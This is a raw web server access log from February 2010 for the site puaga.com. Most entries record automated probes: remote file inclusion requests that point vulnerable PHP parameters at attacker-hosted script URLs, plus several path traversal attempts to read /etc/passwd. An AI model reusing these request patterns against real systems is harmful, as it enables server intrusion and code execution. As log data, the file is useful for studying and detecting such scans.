77.225.42.178 - - [24/Feb/2010:09:37:27 -0800] "GET /logs/access_100130.log//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [24/Feb/2010:09:37:28 -0800] "GET /logs/access_100130.log//config/dbutil.bck.php?confdir=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:09:39:03 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:26 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:26 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:28 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:28 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:28 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:29 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:32 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [24/Feb/2010:09:39:32 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:09:39:43 -0800] "GET /logs/access_100214.log//bbs/write_comment_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:12 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:12 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.223 - - [24/Feb/2010:09:40:18 -0800] "GET /logs/access_100221.log HTTP/1.0" 200 1529324 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:20 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [24/Feb/2010:09:40:20 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:09:40:36 -0800] "GET /%20/index.php?view=page&pagename=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:09:40:38 -0800] "GET /%20/index.php?view=page&pagename=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:09:41:21 -0800] "GET /logs/access.log///gnu/bbs///write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.111.173.72 - - [24/Feb/2010:09:42:38 -0800] "GET /join.php?DOCUMENT_ROOT=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.111.173.72 - - [24/Feb/2010:09:42:39 -0800] "GET /join.php?DOCUMENT_ROOT=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:09:44:44 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:09:44:44 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
67.195.112.223 - - [24/Feb/2010:09:46:07 -0800] "GET /logs/access_100218.log HTTP/1.0" 200 1464129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:47:46 -0800] "GET /logs/access_100204.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:47:47 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:47:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:48:32 -0800] "GET /logs/access_100209.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:48:32 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:48:32 -0800] "GET /logs/access_100204.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:48:38 -0800] "GET /logs/access_100204.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:48:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:48:38 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:50:18 -0800] "GET /logs/access_100209.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:50:53 -0800] "GET /logs/access_100204.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:50:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:50:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:50:54 -0800] "GET /logs/access_100209.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:51:11 -0800] "GET /logs/access_100209.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:51:28 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:51:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:51:49 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:52:18 -0800] "GET /logs/access_100214.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:09:52:59 -0800] "GET /logs/access_100217.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:54:44 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:54:45 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:54:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:55:15 -0800] "GET /logs/access_100214.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:56:50 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:56:50 -0800] "GET /logs/access_100211.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:56:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:56:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:56:51 -0800] "GET /logs/access_100211.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:56:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:57:41 -0800] "GET /logs/access_100211.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:57:41 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:57:42 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:09:57:47 -0800] "GET /logs/access.log%20%20///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:09:57:47 -0800] "GET /logs///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:09:57:48 -0800] "GET //?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:09:58:02 -0800] "GET /logs/access.log%20%20///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:09:58:02 -0800] "GET //?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:09:58:03 -0800] "GET /logs///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:09:58:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:58:12 -0800] "GET /logs/access_100212.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [24/Feb/2010:09:58:20 -0800] "GET /logs/access_100210.log%20%20///?include_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:09:58:20 -0800] "GET /logs/access_100212.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:02:32 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:02:32 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:02:33 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:02:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:02:37 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:02:37 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:02:47 -0800] "GET /logs/access_100210.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.88.24.25 - - [24/Feb/2010:10:03:52 -0800] "GET /grader HTTP/1.1" 301 94 "-" "Yandex/1.01.001 (compatible; Win16; I)" "simple.puaga.com"
77.88.24.25 - - [24/Feb/2010:10:03:55 -0800] "GET /grader/ HTTP/1.1" 302 5 "-" "Yandex/1.01.001 (compatible; Win16; I)" "simple.puaga.com"
67.195.112.223 - - [24/Feb/2010:10:06:03 -0800] "GET /logs/access_090515.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.223 - - [24/Feb/2010:10:06:04 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_090515.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.223 - - [24/Feb/2010:10:06:04 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_090515.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:08:35 -0800] "GET /logs/access_100118.log//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:08:35 -0800] "GET /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:08:35 -0800] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:10:09:16 -0800] "GET /modules/Forums/admin/admin_words.php?phpbb_root_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:09:29 -0800] "GET /logs//board/bbs/delete.php?board_skin_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:09:29 -0800] "GET /board/bbs/delete.php?board_skin_path=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:10:15 -0800] "GET /logs/access_100118.log//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:10:15 -0800] "GET /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [24/Feb/2010:10:10:15 -0800] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.zooluxx.ru//id/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:10:10:24 -0800] "GET /logs/access_100219.log%20%20//bbs///////good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:10:10:24 -0800] "GET /logs//bbs///////good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [24/Feb/2010:10:10:24 -0800] "GET /bbs///////good.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:24 -0800] "GET /logs/access_100121.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:25 -0800] "GET /logs/access_100120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:25 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:25 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:33 -0800] "GET /logs/access_100121.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:33 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:33 -0800] "GET /logs/access_100120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:10:10:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:10:35 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:10:35 -0800] "GET /logs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:10:35 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:10:43 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:10:10:43 -0800] "GET /logs/access_100203.log%20%20/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
